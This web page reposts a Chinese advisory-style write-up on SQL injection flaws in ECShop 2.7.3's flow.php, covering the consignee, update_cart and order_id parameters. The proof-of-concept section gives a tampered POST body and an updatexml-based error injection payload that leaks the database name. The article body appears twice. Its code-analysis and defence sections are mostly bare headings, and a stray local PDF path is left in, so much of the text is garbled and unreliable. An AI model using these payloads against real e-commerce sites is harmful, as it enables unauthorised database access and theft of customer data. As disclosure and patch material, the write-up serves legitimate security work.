您现在的位置是:首页 > cms教程 > ecshop商城教程ecshop商城教程
ecshop漏洞修复/flow.php SQL Injection Vul
凌瑶2024-12-18 21:11:46ecshop商城教程已有5人查阅
导读ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码
catalog
复制代码
1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考
复制代码
1. 漏洞描述
ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码
Relevant Link:
2. 漏洞触发条件
0x1: POC1
复制代码
1. 先注册账户,随便选个商品进购物车,然后填地址,电话等等
2. 把任意商品加入购物车在填写配送地址那一页,有地区选择
3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1
//比如省选择安徽
3. 其中POST数据如下
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
用firefox tamper data改成 4. 就会回显错误页面了
复制代码
0x2: POC2 0x3: order_id注入
http://127.0.0.1/ECShop_V2.7.3/flow.php?step=repurchase
post
order_id=1 or updatexml(1,concat(0x7e,(database())),0) or 11#
file:///C:/Users/zhenghan.zh/Desktop/%E3%80%90%E5%B7%B2%E8%BD%AC%E6%AD%A3%E3%80%91Ecshop3.pdf
3. 漏洞影响范围
4. 漏洞代码分析
0x1: step = consignee 注入点
/flow.php 0x2: step = update_cart 注入点
/flow.php 黑客注入这种payload,实现key sql注入 5. 防御方法
0x1: step = consignee 注入点
/flow.php 需要注意的是,empty函数参数必须为variable,不能为其它函数的返回值,包括str_replace、trim等等,否则会报错
Can't use function return value in write context
0x2: step = update_cart 注入点 0x3: step = order_id 注入点 6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
复制代码
1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考
复制代码
1. 漏洞描述
ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码
Relevant Link:
2. 漏洞触发条件
0x1: POC1
复制代码
1. 先注册账户,随便选个商品进购物车,然后填地址,电话等等
2. 把任意商品加入购物车在填写配送地址那一页,有地区选择
3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1
//比如省选择安徽
3. 其中POST数据如下
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
用firefox tamper data改成 4. 就会回显错误页面了
复制代码
0x2: POC2 0x3: order_id注入
http://127.0.0.1/ECShop_V2.7.3/flow.php?step=repurchase
post
order_id=1 or updatexml(1,concat(0x7e,(database())),0) or 11#
file:///C:/Users/zhenghan.zh/Desktop/%E3%80%90%E5%B7%B2%E8%BD%AC%E6%AD%A3%E3%80%91Ecshop3.pdf
3. 漏洞影响范围
4. 漏洞代码分析
0x1: step = consignee 注入点
/flow.php 0x2: step = update_cart 注入点
/flow.php 黑客注入这种payload,实现key sql注入 5. 防御方法
0x1: step = consignee 注入点
/flow.php 需要注意的是,empty函数参数必须为variable,不能为其它函数的返回值,包括str_replace、trim等等,否则会报错
Can't use function return value in write context
0x2: step = update_cart 注入点 0x3: step = order_id 注入点 6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
本文标签:
很赞哦! (0)
下一篇:ecshop怎么增加模板页
暂无内容 |
暂无内容 |
相关文章
暂无内容 |
暂无内容 |
随机图文
ecshop分类添加封面图的方法
ecshop的模板有很多不完善的地方,比如添加商品分类的时无法添加分类代表图,不能实现我们想要的效果,那么该如解决呢?ecshop标签整理
页面标题 {$page_title}页面关键字 {$keywords}产品分类父分类列表 {foreach from=$categories item=cat }父分类超链接 [url==”{$cat.url}”>{$cat.name|escape:html}ecshop商城杂志管理设置说明介绍
这是添加杂志的页面,本着简单的原则,我们尽量做到简单明了、实用 好。很轻松的,你就可以添加一份杂志的内容了。PHP5.6.6运行ecshop不兼容报错的解决方法
在安装完php在自己的服务器上以后, 发现在静态网页上出现了很多 error。在网上查找过后发现,大部分问题是因为 PHP发展到PHP5.5版本以后,有了很多细微的变化。
留言与评论 (共有 0 条评论) |